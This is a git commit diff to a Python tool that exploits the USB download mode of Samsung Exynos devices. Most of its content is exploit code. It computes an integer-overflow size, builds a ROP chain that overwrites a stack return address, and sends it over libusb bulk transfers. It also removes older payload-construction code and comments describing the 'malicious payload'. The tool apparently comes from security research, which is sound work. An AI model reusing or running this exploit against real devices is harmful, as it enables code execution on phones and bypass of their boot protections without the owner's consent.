removed static code

This commit is contained in:
Eljakim Herrewijnen 2024-07-15 23:33:09 +02:00
parent ead9a8a197
commit d7a740d173

View File

@ -92,8 +92,9 @@ class ExynosDevice():
current_offset = TARGET_OFFSETS[self.target][0]
transferred = ctypes.c_int()
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
max_payload_size = 0x100000000 - size_to_overflow
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
@ -133,11 +134,8 @@ class ExynosDevice():
cnt += 1
print(f"{cnt} {hex(current_offset)}")
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
# Should
# Build ROP chain.
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
transferred = ctypes.c_int(0)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
@ -146,70 +144,7 @@ class ExynosDevice():
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]
padding_size -= len(payload)
# Construct payload, we can only overflow with 1 transfer.
dl_buf_current = DL_BUFFER_START
if len(payload) > MAX_PAYLOAD_SIZE:
print("payload too big!")
return
payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc")
payload = struct.pack("<II", 0, MAX_PAYLOAD_SIZE) + \
payload + struct.pack("H", 0)
assert (len(payload) == BLOCK_SIZE)
# while True:
# print(".", end="")
# self.write(b"")
padding_size = TARGET_OFFSETS[self.target][1] - \
TARGET_OFFSETS[self.target][0]
padding_size -= MAX_PAYLOAD_SIZE
padding_size += 8
chunk_cnt = padding_size // CHUNK_SIZE
padding_size = padding_size % CHUNK_SIZE
block_cnt = padding_size // BLOCK_SIZE
padding_size = padding_size % BLOCK_SIZE
if (padding_size == 0 and block_cnt > 0):
block_cnt -= 1
padding_size = BLOCK_SIZE
ram_size = padding_size + 4 + 2
# # Reconstruct stack
ram = b"\xcc" * ram_size
ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:]
# *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :]
payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size
pass
# payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size;
# dprint("malicious payload->size=0x%x\n", payload->size);
# uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER];
# dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw);
# if(min_size_to_overflw > payload->size)
# printf("ERROR : min_size_to_overflw > payload->size\n");
# // step 3 : usb communication
# printf("- exploit: sending payload...\n");
# rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0);
# if(rc) {
# printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc);
# fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc));
# return rc;
# }
if __name__ == "__main__":